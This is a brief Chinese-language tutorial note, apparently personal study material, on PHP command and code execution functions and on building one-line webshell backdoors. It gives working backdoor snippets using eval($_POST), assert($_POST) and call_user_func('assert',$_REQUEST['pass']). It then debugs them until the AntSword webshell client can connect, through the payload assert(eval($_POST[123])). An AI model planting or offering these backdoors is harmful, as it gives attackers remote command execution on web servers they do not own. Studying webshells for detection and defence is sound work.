1.系统命令执行   直接windows或liunx命令 各个程序 相应的函数 来实现

system exec shell_Exec passshru

2.执行代码 eval assert php代码 系统 

<?php eval($_POST)

<?php assert($_POST)

简单的测试

回调后门函数call_user_func(1,2)

1是回调的函数

2是回调的参数

<?php
call_user_func('assert',$_REQUEST['pass']);

可以接get，post传参

这样一个函数可以执行我们的命令

可以执行我们的php代码就可以执行系统命令

那我们考虑如何执行我们的后门

执行一句话pass传入

$_POST[123]

就会形成

assert($_POST[123]) 

用antsword进行连接尝试这个后门是否可以执行

但是用这个一句话执行不了

经过查阅发现assert是可以执行函数而不可以直接执行$_POST[123]

所以我们可以改一下

assert(eval($_POST[123])

这样antsword就可以执行